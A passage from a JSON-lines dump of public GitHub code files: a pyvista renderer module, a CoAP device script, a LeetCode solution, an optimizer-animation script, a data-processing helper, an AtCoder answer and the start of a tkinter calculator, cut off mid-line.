pl.add_mesh(\n ... pv.Sphere(), pbr=True, metallic=0.9, roughness=0.4\n ... )\n >>> pl.set_environment_texture(cubemap)\n >>> pl.remove_environment_texture()\n >>> pl.camera_position = 'xy'\n >>> pl.show()\n\n \"\"\"\n self.UseImageBasedLightingOff()\n self.SetEnvironmentTexture(None)\n self.Modified()\n\n def close(self):\n \"\"\"Close out widgets and sensitive elements.\"\"\"\n self.RemoveAllObservers()\n if hasattr(self, 'axes_widget'):\n self.hide_axes() # Necessary to avoid segfault\n self.axes_actor = None\n del self.axes_widget\n\n if self._empty_str is not None:\n self._empty_str.SetReferenceCount(0)\n self._empty_str = None\n\n def on_plotter_render(self):\n \"\"\"Notify renderer components of explicit plotter render call.\"\"\"\n if self.__charts is not None:\n for chart in self.__charts:\n # Notify Charts that plotter.render() is called\n chart._render_event(plotter_render=True)\n\n def deep_clean(self, render=False):\n \"\"\"Clean the renderer of the memory.\n\n Parameters\n ----------\n render : bool, optional\n Render the render window after removing the bounding box\n (if applicable).\n\n \"\"\"\n if self.cube_axes_actor is not None:\n self.cube_axes_actor = None\n\n if hasattr(self, 'edl_pass'):\n del self.edl_pass\n if hasattr(self, '_box_object'):\n self.remove_bounding_box(render=render)\n if hasattr(self, '_shadow_pass') and self._shadow_pass is not None:\n self.disable_shadows()\n try:\n if self.__charts is not None:\n self.__charts.deep_clean()\n self.__charts = None\n except AttributeError: # pragma: no cover\n pass\n\n self._render_passes.deep_clean()\n self.remove_floors(render=render)\n self.remove_legend(render=render)\n self.RemoveAllViewProps()\n self._actors = {}\n self._camera = None\n self._bounding_box = None\n self._marker_actor = None\n self._border_actor = None\n # remove reference to parent last\n self.parent = None\n\n def __del__(self):\n \"\"\"Delete the renderer.\"\"\"\n self.deep_clean()\n\n def enable_hidden_line_removal(self):\n \"\"\"Enable hidden line removal.\"\"\"\n self.UseHiddenLineRemovalOn()\n\n def disable_hidden_line_removal(self):\n \"\"\"Disable hidden line removal.\"\"\"\n self.UseHiddenLineRemovalOff()\n\n @property\n def layer(self): # numpydoc ignore=RT01\n \"\"\"Return or set the current layer of this renderer.\"\"\"\n return self.GetLayer()\n\n @layer.setter\n def layer(self, layer): # numpydoc ignore=GL08\n self.SetLayer(layer)\n\n @property\n def viewport(self): # numpydoc ignore=RT01\n \"\"\"Viewport of the renderer.\n\n Viewport describes the ``(xstart, ystart, xend, yend)`` square\n of the renderer relative to the main renderer window.\n\n For example, a renderer taking up the entire window will have\n a viewport of ``(0.0, 0.0, 1.0, 1.0)``, while the viewport of\n a renderer on the left-hand side of a horizontally split window\n would be ``(0.0, 0.0, 0.5, 1.0)``.\n\n Returns\n -------\n tuple\n Viewport in the form ``(xstart, ystart, xend, yend)``.\n\n Examples\n --------\n Show the viewport of a renderer taking up half the render\n window.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter(shape=(1, 2))\n >>> pl.renderers[0].viewport\n (0.0, 0.0, 0.5, 1.0)\n\n \"\"\"\n return self.GetViewport()\n\n @property\n def width(self): # numpydoc ignore=RT01\n \"\"\"Width of the renderer.\"\"\"\n xmin, _, xmax, _ = self.viewport\n return self.parent.window_size[0] * (xmax - xmin)\n\n @property\n def height(self): # numpydoc ignore=RT01\n \"\"\"Height of the renderer.\"\"\"\n _, ymin, _, ymax = self.viewport\n return self.parent.window_size[1] * (ymax - ymin)\n\n def add_legend(\n self,\n labels=None,\n bcolor=(0.5, 0.5, 0.5),\n border=False,\n size=(0.2, 0.2),\n name=None,\n loc='upper right',\n face='triangle',\n ):\n \"\"\"Add a legend to render window.\n\n Entries must be a list containing one string and color entry for each\n item.\n\n Parameters\n ----------\n labels : list, optional\n When set to ``None``, uses existing labels as specified by\n\n - :func:`add_mesh `\n - :func:`add_lines `\n - :func:`add_points `\n\n List containing one entry for each item to be added to the\n legend. Each entry must contain two strings, [label,\n color], where label is the name of the item to add, and\n color is the color of the label to add.\n\n bcolor : ColorLike, default: (0.5, 0.5, 0.5)\n Background color, either a three item 0 to 1 RGB color\n list, or a matplotlib color string (e.g. ``'w'`` or ``'white'``\n for a white color). If None, legend background is\n disabled.\n\n border : bool, default: False\n Controls if there will be a border around the legend.\n Default False.\n\n size : sequence[float], default: (0.2, 0.2)\n Two float sequence, each float between 0 and 1. For example\n ``(0.1, 0.1)`` would make the legend 10% the size of the\n entire figure window.\n\n name : str, optional\n The name for the added actor so that it can be easily\n updated. If an actor of this name already exists in the\n rendering window, it will be replaced by the new actor.\n\n loc : str, default: \"upper right\"\n Location string. One of the following:\n\n * ``'upper right'``\n * ``'upper left'``\n * ``'lower left'``\n * ``'lower right'``\n * ``'center left'``\n * ``'center right'``\n * ``'lower center'``\n * ``'upper center'``\n * ``'center'``\n\n face : str | pyvista.PolyData | NoneType, default: \"triangle\"\n Face shape of legend face. One of the following:\n\n * None: ``None``\n * Line: ``\"-\"`` or ``\"line\"``\n * Triangle: ``\"^\"`` or ``'triangle'``\n * Circle: ``\"o\"`` or ``'circle'``\n * Rectangle: ``\"r\"`` or ``'rectangle'``\n * Custom: :class:`pyvista.PolyData`\n\n Passing ``None`` removes the legend face. A custom face can be\n created using :class:`pyvista.PolyData`. This will be rendered\n from the XY plane.\n\n Returns\n -------\n vtk.vtkLegendBoxActor\n Actor for the legend.\n\n Examples\n --------\n Create a legend by labeling the meshes when using ``add_mesh``\n\n >>> import pyvista as pv\n >>> from pyvista import examples\n >>> sphere = pv.Sphere(center=(0, 0, 1))\n >>> cube = pv.Cube()\n >>> plotter = pv.Plotter()\n >>> _ = plotter.add_mesh(\n ... sphere, 'grey', smooth_shading=True, label='Sphere'\n ... )\n >>> _ = plotter.add_mesh(cube, 'r', label='Cube')\n >>> _ = plotter.add_legend(bcolor='w', face=None)\n >>> plotter.show()\n\n Alternatively provide labels in the plotter.\n\n >>> plotter = pv.Plotter()\n >>> _ = plotter.add_mesh(sphere, 'grey', smooth_shading=True)\n >>> _ = plotter.add_mesh(cube, 'r')\n >>> legend_entries = []\n >>> legend_entries.append(['My Mesh', 'w'])\n >>> legend_entries.append(['My Other Mesh', 'k'])\n >>> _ = plotter.add_legend(legend_entries)\n >>> plotter.show()\n\n \"\"\"\n if self.legend is not None:\n self.remove_legend()\n self._legend = _vtk.vtkLegendBoxActor()\n\n if labels is None:\n # use existing labels\n if not self._labels:\n raise ValueError(\n 'No labels input.\\n\\n'\n 'Add labels to individual items when adding them to'\n 'the plotting object with the \"label=\" parameter. '\n 'or enter them as the \"labels\" parameter.'\n )\n\n self._legend.SetNumberOfEntries(len(self._labels))\n for i, (vtk_object, text, color) in enumerate(self._labels.values()):\n if face is None:\n # dummy vtk object\n vtk_object = pyvista.PolyData([0.0, 0.0, 0.0])\n\n self._legend.SetEntry(i, vtk_object, text, color.float_rgb)\n\n else:\n self._legend.SetNumberOfEntries(len(labels))\n\n legend_face = make_legend_face(face)\n for i, (text, color) in enumerate(labels):\n self._legend.SetEntry(i, legend_face, text, Color(color).float_rgb)\n\n if loc is not None:\n if loc not in ACTOR_LOC_MAP:\n allowed = '\\n'.join([f'\\t * \"{item}\"' for item in ACTOR_LOC_MAP])\n raise ValueError(f'Invalid loc \"{loc}\". Expected one of the following:\\n{allowed}')\n x, y, size = map_loc_to_pos(loc, size, border=0.05)\n self._legend.SetPosition(x, y)\n self._legend.SetPosition2(size[0], size[1])\n\n if bcolor is None:\n self._legend.SetUseBackground(False)\n else:\n self._legend.SetUseBackground(True)\n self._legend.SetBackgroundColor(Color(bcolor).float_rgb)\n\n self._legend.SetBorder(border)\n\n self.add_actor(self._legend, reset_camera=False, name=name, pickable=False)\n return self._legend\n\n def remove_legend(self, render=True):\n \"\"\"Remove the legend actor.\n\n Parameters\n ----------\n render : bool, default: True\n Render upon actor removal. Set this to ``False`` to stop\n the render window from rendering when a the legend is removed.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> mesh = pv.Sphere()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(mesh, label='sphere')\n >>> _ = pl.add_legend()\n >>> pl.remove_legend()\n\n \"\"\"\n if self.legend is not None:\n self.remove_actor(self.legend, reset_camera=False, render=render)\n self._legend = None\n\n @property\n def legend(self): # numpydoc ignore=RT01\n \"\"\"Legend actor.\"\"\"\n return self._legend\n\n def add_ruler(\n self,\n pointa,\n pointb,\n flip_range=False,\n number_labels=5,\n show_labels=True,\n font_size_factor=0.6,\n label_size_factor=1.0,\n label_format=None,\n title=\"Distance\",\n number_minor_ticks=0,\n tick_length=5,\n minor_tick_length=3,\n show_ticks=True,\n tick_label_offset=2,\n label_color=None,\n tick_color=None,\n ):\n \"\"\"Add ruler.\n\n The ruler is a 2D object that is not occluded by 3D objects.\n To avoid issues with perspective, it is recommended to use\n parallel projection, i.e. :func:`Plotter.enable_parallel_projection`,\n and place the ruler orthogonal to the viewing direction.\n\n The title and labels are placed to the right of ruler moving from\n ``pointa`` to ``pointb``. Use ``flip_range`` to flip the ``0`` location,\n if needed.\n\n Since the ruler is placed in an overlay on the viewing scene, the camera\n does not automatically reset to include the ruler in the view.\n\n Parameters\n ----------\n pointa : sequence[float]\n Starting point for ruler.\n\n pointb : sequence[float]\n Ending point for ruler.\n\n flip_range : bool, default: False\n If ``True``, the distance range goes from ``pointb`` to ``pointa``.\n\n number_labels : int, default: 5\n Number of labels to place on ruler.\n\n show_labels : bool, default: True\n Whether to show labels.\n\n font_size_factor : float, default: 0.6\n Factor to scale font size overall.\n\n label_size_factor : float, default: 1.0\n Factor to scale label size relative to title size.\n\n label_format : str, optional\n A printf style format for labels, e.g. '%E'.\n\n title : str, default: \"Distance\"\n The title to display.\n\n number_minor_ticks : int, default: 0\n Number of minor ticks between major ticks.\n\n tick_length : int, default: 5\n Length of ticks in pixels.\n\n minor_tick_length : int, default: 3\n Length of minor ticks in pixels.\n\n show_ticks : bool, default: True\n Whether to show the ticks.\n\n tick_label_offset : int, default: 2\n Offset between tick and label in pixels.\n\n label_color : ColorLike, optional\n Either a string, rgb list, or hex color string for\n label and title colors.\n\n .. warning::\n This is either white or black.\n\n tick_color : ColorLike, optional\n Either a string, rgb list, or hex color string for\n tick line colors.\n\n Returns\n -------\n vtk.vtkActor\n VTK actor of the ruler.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> cone = pv.Cone(height=2.0, radius=0.5)\n >>> plotter = pv.Plotter()\n >>> _ = plotter.add_mesh(cone)\n\n Measure x direction of cone and place ruler slightly below.\n\n >>> _ = plotter.add_ruler(\n ... pointa=[cone.bounds[0], cone.bounds[2] - 0.1, 0.0],\n ... pointb=[cone.bounds[1], cone.bounds[2] - 0.1, 0.0],\n ... title=\"X Distance\",\n ... )\n\n Measure y direction of cone and place ruler slightly to left.\n The title and labels are placed to the right of the ruler when\n traveling from ``pointa`` to ``pointb``.\n\n >>> _ = plotter.add_ruler(\n ... pointa=[cone.bounds[0] - 0.1, cone.bounds[3], 0.0],\n ... pointb=[cone.bounds[0] - 0.1, cone.bounds[2], 0.0],\n ... flip_range=True,\n ... title=\"Y Distance\",\n ... )\n >>> plotter.enable_parallel_projection()\n >>> plotter.view_xy()\n >>> plotter.show()\n\n \"\"\"\n label_color = Color(label_color, default_color=self._theme.font.color)\n tick_color = Color(tick_color, default_color=self._theme.font.color)\n\n ruler = _vtk.vtkAxisActor2D()\n\n ruler.GetPositionCoordinate().SetCoordinateSystemToWorld()\n ruler.GetPosition2Coordinate().SetCoordinateSystemToWorld()\n ruler.GetPositionCoordinate().SetReferenceCoordinate(None)\n ruler.GetPositionCoordinate().SetValue(pointa[0], pointa[1], pointa[2])\n ruler.GetPosition2Coordinate().SetValue(pointb[0], pointb[1], pointb[2])\n\n distance = np.linalg.norm(np.asarray(pointa) - np.asarray(pointb))\n if flip_range:\n ruler.SetRange(distance, 0)\n else:\n ruler.SetRange(0, distance)\n\n ruler.SetTitle(title)\n ruler.SetFontFactor(font_size_factor)\n ruler.SetLabelFactor(label_size_factor)\n ruler.SetNumberOfLabels(number_labels)\n ruler.SetLabelVisibility(show_labels)\n if label_format:\n ruler.SetLabelFormat(label_format)\n ruler.GetProperty().SetColor(*tick_color.int_rgb)\n if label_color != Color('white'):\n # This property turns black if set\n ruler.GetLabelTextProperty().SetColor(*label_color.int_rgb)\n ruler.GetTitleTextProperty().SetColor(*label_color.int_rgb)\n ruler.SetNumberOfMinorTicks(number_minor_ticks)\n ruler.SetTickVisibility(show_ticks)\n ruler.SetTickLength(tick_length)\n ruler.SetMinorTickLength(minor_tick_length)\n ruler.SetTickOffset(tick_label_offset)\n\n self.add_actor(ruler, reset_camera=True, pickable=False)\n return ruler\n\n def add_legend_scale(\n self,\n corner_offset_factor=2.0,\n bottom_border_offset=30,\n top_border_offset=30,\n left_border_offset=30,\n right_border_offset=30,\n bottom_axis_visibility=True,\n top_axis_visibility=True,\n left_axis_visibility=True,\n right_axis_visibility=True,\n legend_visibility=True,\n xy_label_mode=False,\n render=True,\n color=None,\n font_size_factor=0.6,\n label_size_factor=1.0,\n label_format=None,\n number_minor_ticks=0,\n tick_length=5,\n minor_tick_length=3,\n show_ticks=True,\n tick_label_offset=2,\n ):\n \"\"\"Annotate the render window with scale and distance information.\n\n Its basic goal is to provide an indication of the scale of the scene.\n Four axes surrounding the render window indicate (in a variety of ways)\n the scale of what the camera is viewing. An option also exists for\n displaying a scale legend.\n\n Parameters\n ----------\n corner_offset_factor : float, default: 2.0\n The corner offset value.\n\n bottom_border_offset : int, default: 30\n Bottom border offset. Recommended value ``50``.\n\n top_border_offset : int, default: 30\n Top border offset. Recommended value ``50``.\n\n left_border_offset : int, default: 30\n Left border offset. Recommended value ``100``.\n\n right_border_offset : int, default: 30\n Right border offset. Recommended value ``100``.\n\n bottom_axis_visibility : bool, default: True\n Whether the bottom axis is visible.\n\n top_axis_visibility : bool, default: True\n Whether the top axis is visible.\n\n left_axis_visibility : bool, default: True\n Whether the left axis is visible.\n\n right_axis_visibility : bool, default: True\n Whether the right axis is visible.\n\n legend_visibility : bool, default: True\n Whether the legend scale is visible.\n\n xy_label_mode : bool, default: False\n The axes can be programmed either to display distance scales\n or x-y coordinate values. By default,\n the scales display a distance. However, if you know that the\n view is down the z-axis, the scales can be programmed to display\n x-y coordinate values.\n\n render : bool, default: True\n Whether to render when the actor is added.\n\n color : ColorLike, optional\n Either a string, rgb list, or hex color string for tick text\n and tick line colors.\n\n .. warning::\n The axis labels tend to be either white or black.\n\n font_size_factor : float, default: 0.6\n Factor to scale font size overall.\n\n label_size_factor : float, default: 1.0\n Factor to scale label size relative to title size.\n\n label_format : str, optional\n A printf style format for labels, e.g. ``'%E'``.\n See :ref:`old-string-formatting`.\n\n number_minor_ticks : int, default: 0\n Number of minor ticks between major ticks.\n\n tick_length : int, default: 5\n Length of ticks in pixels.\n\n minor_tick_length : int, default: 3\n Length of minor ticks in pixels.\n\n show_ticks : bool, default: True\n Whether to show the ticks.\n\n tick_label_offset : int, default: 2\n Offset between tick and label in pixels.\n\n Returns\n -------\n vtk.vtkActor\n The actor for the added ``vtkLegendScaleActor``.\n\n Warnings\n --------\n Please be aware that the axes and scale values are subject to perspective\n effects. The distances are computed in the focal plane of the camera. When\n there are large view angles (i.e., perspective projection), the computed\n distances may provide users the wrong sense of scale. These effects are not\n present when parallel projection is enabled.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> cone = pv.Cone(height=2.0, radius=0.5)\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(cone)\n >>> _ = pl.add_legend_scale()\n >>> pl.show()\n\n \"\"\"\n color = Color(color, default_color=self._theme.font.color)\n\n legend_scale = _vtk.vtkLegendScaleActor()\n legend_scale.SetCornerOffsetFactor(corner_offset_factor)\n legend_scale.SetLegendVisibility(legend_visibility)\n if xy_label_mode:\n legend_scale.SetLabelModeToXYCoordinates()\n else:\n legend_scale.SetLabelModeToDistance()\n legend_scale.SetBottomAxisVisibility(bottom_axis_visibility)\n legend_scale.SetBottomBorderOffset(bottom_border_offset)\n legend_scale.SetLeftAxisVisibility(left_axis_visibility)\n legend_scale.SetLeftBorderOffset(left_border_offset)\n legend_scale.SetRightAxisVisibility(right_axis_visibility)\n legend_scale.SetRightBorderOffset(right_border_offset)\n legend_scale.SetTopAxisVisibility(top_axis_visibility)\n legend_scale.SetTopBorderOffset(top_border_offset)\n\n for text in ['Label', 'Title']:\n prop = getattr(legend_scale, f'GetLegend{text}Property')()\n if color != Color('white'):\n # This property turns black if set\n prop.SetColor(*color.int_rgb)\n prop.SetFontSize(\n int(font_size_factor * 20)\n ) # hack to avoid multiple font size arguments\n\n for ax in ['Bottom', 'Left', 'Right', 'Top']:\n axis = getattr(legend_scale, f'Get{ax}Axis')()\n axis.GetProperty().SetColor(*color.int_rgb)\n if color != Color('white'):\n # This label property turns black if set\n axis.GetLabelTextProperty().SetColor(*color.int_rgb)\n axis.SetFontFactor(font_size_factor)\n axis.SetLabelFactor(label_size_factor)\n if label_format:\n axis.SetLabelFormat(label_format)\n axis.SetNumberOfMinorTicks(number_minor_ticks)\n axis.SetTickLength(tick_length)\n axis.SetMinorTickLength(minor_tick_length)\n axis.SetTickVisibility(show_ticks)\n axis.SetTickOffset(tick_label_offset)\n\n return self.add_actor(\n legend_scale,\n reset_camera=False,\n name='_vtkLegendScaleActor',\n culling=False,\n pickable=False,\n render=render,\n )\n\n\ndef _line_for_legend():\n \"\"\"Create a simple line-like rectangle for the legend.\"\"\"\n points = [\n [0, 0, 0],\n [0.4, 0, 0],\n [0.4, 0.07, 0],\n [0, 0.07, 0],\n [\n 0.5,\n 0,\n 0,\n ], # last point needed to expand the bounds of the PolyData to be rendered smaller\n ]\n legendface = pyvista.PolyData()\n legendface.points = np.array(points)\n legendface.faces = [4, 0, 1, 2, 3]\n return legendface\n","repo_name":"pyvista/pyvista","sub_path":"pyvista/plotting/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":125809,"program_lang":"python","lang":"en","doc_type":"code","stars":2055,"dataset":"github-code","pt":"76"} +{"seq_id":"17001617103","text":"'''\nAuthor: lenzo\nDate: 2021-08-19 09:34:37\nLastEditTime: 2021-08-20 10:11:06\nLastEditors: Please set LastEditors\nDescription: device部分\nFilePath: \\CoAP-MQTT-brige\\device.py\n'''\nfrom coapserver import server\nfrom coapBasic import CoapBasicServer,CoapbasicClient\n\nclass Device(CoapbasicClient,CoapBasicServer):\n def __init__(self,serverAddr='127.0.0.1',serverPort = 5683,clientAddr = '127.0.0.1',clientPort = 5683):\n CoapbasicClient.__init__(self,clientAddr,clientPort)\n CoapBasicServer.__init__(self,serverAddr,serverPort)\n\nif __name__=='__main__':\n\n d = Device(serverPort=5684)\n d.connectServer()\n d.putLoop('Temperature', '27', 5)\n\n d.setServer()\n d.add_resource('TemperatureController')\n d.serverStart()","repo_name":"amazingapple5/CoAP-MQTT-brige","sub_path":"device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"6517834302","text":"class Solution:\n # @param {string} s\n # @param {string} t\n # @return {integer}\n def numDistinct(self, s, t):\n if len(s) < len(t):\n return 0\n if t == \"\":\n return 1\n \n dp = [ [0 for j in range(len(t))] for j in range(len(s)) ]\n dp[0][0] = 1 if s[0]==t[0] else 0\n \n for i in range( 1, len(s) ):\n j = 0\n while j <= i and j < len(t):\n dp[i][j] = dp[i-1][j]\n if s[i] == t[j]:\n dp[i][j] += dp[i-1][j-1] if j > 0 else 1\n j+=1\n\n return dp[len(s)-1][len(t)-1]\n\n\n\n\n\n","repo_name":"thisismonica/leetcode","sub_path":"distinct_subsequences.py","file_name":"distinct_subsequences.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"40274267700","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\n\nfrom optimizers import SGD, Momentum, AdaGrad, AdaDelta, RMSprop, Adam, AMSGrad, Nadam\n# put desired test function name here\nfrom test_functions import Booth as Func\n\n\n# Optimizers\n# lr = df.loc[Opt(func, 0).name, func.name]\noptimizers = {\n\t'SGD': SGD(Func(), lr=0.003),\n\t'Momentum': Momentum(Func(), lr=0.003, momentum=0.9),\n\t'AdaGrad': AdaGrad(Func(), lr=0.5, eps=1e-3),\n\t'AdaDelta': AdaDelta(Func(), lr=0.99, eps=1e-3),\n\t'RMSprop': RMSprop(Func(), lr=0.05, gamma=0.99, eps=1e-8),\n\t'Adam': Adam(Func(), lr=0.5, b1=0.9, b2=0.99, eps=1e-8),\n\t'AMSGrad': AMSGrad(Func(), lr=0.5, b1=0.9, b2=0.88, eps=1e-8),\n\t'Nadam': Nadam(Func(), lr=0.5, b1=0.9, b2=0.99, eps=1e-8),\n}\n\n\nopts = ['SGD', 'Momentum', 'AdaGrad', 'AdaDelta', 'RMSprop', 'Adam', 'AMSGrad', 'Nadam']\n# opts = ['AdaDelta']\nfor o in opts:\n\tfig = plt.figure()\n\tfunc = Func()\n\tif func.name == \"Rosenbrock\":\n\t\tX = np.arange(-4,3.1,0.1)\n\t\tY = np.arange(-2,4.1,0.1)\n\t\tax = plt.axes(xlim=(-4, 3), ylim=(-2, 4))\n\t\tx0 = -2\n\t\ty0 = -1\n\telif func.name == \"Himmelblau\":\n\t\tX = np.arange(-5,5.1,0.1)\n\t\tY = np.arange(-5,5.1,0.1)\n\t\tax = plt.axes(xlim=(-5, 5), ylim=(-5, 5))\n\t\tx0 = 4.5\n\t\ty0 = 4.5\n\telif func.name == 'Booth':\n\t\tX = np.arange(-10,10.1,0.1)\n\t\tY = np.arange(-10,10.1,0.1)\n\t\tax = plt.axes(xlim=(-10, 10), ylim=(-10, 10))\n\t\tx0 = -9\n\t\ty0 = -9\n\tX, Y = np.meshgrid(X, Y)\n\tZ = func.f(X, Y)\n\n\t# Contour of test function\n\tax.contourf(X, Y, Z, 100, cmap='viridis')\n\tax.plot(func.minima[0][0], func.minima[0][1], 'ro', label='Minima')\n\tfor i in range(1, len(func.minima)):\n\t\tax.plot(func.minima[i][0], func.minima[i][1], 'ro')\n\n\n\tdef init():\n\t\tpoint.set_data([], [])\n\t\tstep_text.set_text('')\n\t\tvalue_text.set_text('')\n\t\tgrad_text.set_text('')\n\t\treturn point, step_text, value_text, grad_text\n\tdef animate(i):\n\t\tglobal p\n\t\tpoint.set_data(p[i-1][0], p[i-1][1])\n\t\tstep_text.set_text(f'step: {i}')\n\t\tvalue_text.set_text(f'z: {func.f(p[i-1][0], p[i-1][1]):.3f}')\n\t\tdf = func.df(p[i-1][0], p[i-1][1])\n\t\tgrad_text.set_text(f'grad: ({df[0]:.3f}, {df[1]:.3f})')\n\t\treturn point, step_text, value_text\n\n\n\topt = optimizers[o]\n\tp = []\n\tpoint, = ax.plot([], [], 'yo', label=opt.name)\n\tstep_text = ax.text(0.02, 0.95, '', c='white', transform=ax.transAxes)\n\tvalue_text = ax.text(0.02, 0.91, '', c='white', transform=ax.transAxes)\n\tgrad_text = ax.text(0.02, 0.87, '', c='white', transform=ax.transAxes)\n\tp.append(opt.step(x0, y0))\n\tN = 300\n\tfor i in range(1, N):\n\t\tp.append(opt.step(p[i-1][0], p[i-1][1]))\n\n\tplt.legend(loc='lower right')\n\ttry:\n\t\tos.mkdir(f'test_gifs/{func.name}/')\n\texcept Exception as e:\n\t\tpass\n\tanim = animation.FuncAnimation(fig, animate, init_func=init, frames=N, blit=True)\n\tprint(f'Writing to test_gifs/'+func.name+'/'+opt.name+'.gif')\n\tanim.save('test_gifs/'+func.name+'/'+opt.name+'.gif', writer='imagemagick', fps=60)\n\n\t# ax.plot(p[-1][0],p[-1][1],'yo')\n\n\n\t# plt.show()\n","repo_name":"hoangminhquan-lhsdt/optimizers","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"26911278366","text":"import numpy as np\nimport os\n\ndef reward2step(plot_reward, max_episode_length):\n # plot_reward.shape=[steps_num]\n plot_steps = max_episode_length * np.ones(plot_reward.shape)\n cum_rewards = plot_reward[max_episode_length:] - plot_reward[:-max_episode_length]\n plot_steps[max_episode_length:] = max_episode_length / cum_rewards\n plot_steps[np.isinf(plot_steps)] = max_episode_length\n return plot_steps\n\n# def reward2step(plot_reward, max_episode_length):\n# # plot_reward.shape=[tasks_num, trails_num, steps_num]\n# tasks_num, trails_num, steps_num = plot_reward.shape\n# plot_steps = max_episode_length * np.ones(plot_reward.shape)\n#\n# for task_id in range(tasks_num):\n# for trail_id in range(trails_num):\n# cum_rewards = plot_reward[task_id, trail_id, max_episode_length:] - plot_reward[task_id, trail_id, :-max_episode_length]\n# plot_steps[task_id, trail_id, max_episode_length:] = max_episode_length / cum_rewards\n# one_dim_steps = plot_steps[task_id,trail_id,:]\n# one_dim_steps[np.isinf(one_dim_steps)] = max_episode_length\n# plot_steps[task_id,trail_id, :] = one_dim_steps\n# return plot_steps\n\n\nif __name__ == '__main__':\n projectDir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))\n\n data_path = os.path.join(projectDir, 'lifelong_rl_with_rm_data', \"minecraft\", \"reward(2021)\")\n zip_data_path = os.path.join(projectDir, 'lifelong_rl_with_rm_data', \"minecraft\", \"steps(2021)\")\n\n for algorithm in [\"QRM\", \"QRMrs\", \"TQRMbest\", \"TQRMworst\"]:\n data_reward = np.load(os.path.join(data_path, algorithm+\"norm.npy\"))\n tasks_num, trails_num, steps_num = data_reward.shape\n data_step = np.zeros(data_reward.shape)\n for task_id in range(tasks_num):\n for trail_id in range(trails_num):\n data_step[task_id,trail_id] = reward2step(data_reward[task_id,trail_id], 500)\n # zip_data = data_step[:,:,::100]\n zip_data = data_step\n np.save(os.path.join(zip_data_path, algorithm+\"norm.npy\"), zip_data)\n","repo_name":"zhengxj28/lifelong_rl_with_rm","sub_path":"src/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42172380186","text":"N = int(input())\nS = input()\n\nans = []\nfor i in range(1, N):\n a = 0\n for k in range(N - i):\n if S[k] == S[k + i]: break\n a += 1\n\n ans.append(a)\n\nfor a in ans:\n print(a)\n","repo_name":"ymtz13/CompetitiveProgramming","sub_path":"AtCoder/ABC285/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15176879744","text":"import tkinter as tk\nwindow=tk.Tk()\nwindow.title('Calculator')\nwindow.iconbitmap('calc.ico')\nwindow.geometry('455x575')\nwindow.configure(bg='#0fe9a0')\nwindow.resizable(width=False,height=False)\nexpression=''\nans=0\ndef press(num):\n global expression\n expression = expression+str(num)\n equation.set(expression)\ndef clear():\n global expression\n expression=''\n equation.set(expression)\n equation.set('0')\ndef equalpress():\n global expression\n global ans\n try:\n equation.set(str(eval(expression)))\n expression=str(eval(expression))\n ans=eval(expression)\n expression=''\n except:\n equation.set('error')\n expression=''\ndef backspace():\n global expression\n try:\n expression=expression[0:(len(expression)-1)]\n if len(expression)>0:\n equation.set(expression)\n else:\n equation.set(0)\n except:\n pass\nbuttonframe=tk.Frame(master=window,bg='#0fe9a0')\n\nequation=tk.StringVar()\nequation.set('0')\n\n\nentrybox= tk.Entry(master=buttonframe,justify='right',textvariable= equation,font=('arial',20,'bold'))\nbutton1=tk.Button(master=buttonframe, text='1',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(1))\nbutton2=tk.Button(master=buttonframe, text='2',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(2))\nbutton3=tk.Button(master=buttonframe, text='3',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(3))\nbutton4=tk.Button(master=buttonframe, text='4',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(4))\nbutton5=tk.Button(master=buttonframe, text='5',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(5))\nbutton6=tk.Button(master=buttonframe, text='6',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(6))\nbutton7=tk.Button(master=buttonframe, text='7',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(7))\nbutton8=tk.Button(master=buttonframe, text='8',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(8))\nbutton9=tk.Button(master=buttonframe, text='9',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(9))\nbutton0=tk.Button(master=buttonframe, text='0',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(0))\nbuttonplus=tk.Button(master=buttonframe, text='+',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press('+'))\nbuttonminus=tk.Button(master=buttonframe, text='-',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press('-'))\nbuttonmult=tk.Button(master=buttonframe, text='x',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press('*'))\nbuttonpoint=tk.Button(master=buttonframe, text='.',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press('.'))\nbuttondiv=tk.Button(master=buttonframe, text='/',font=('times new 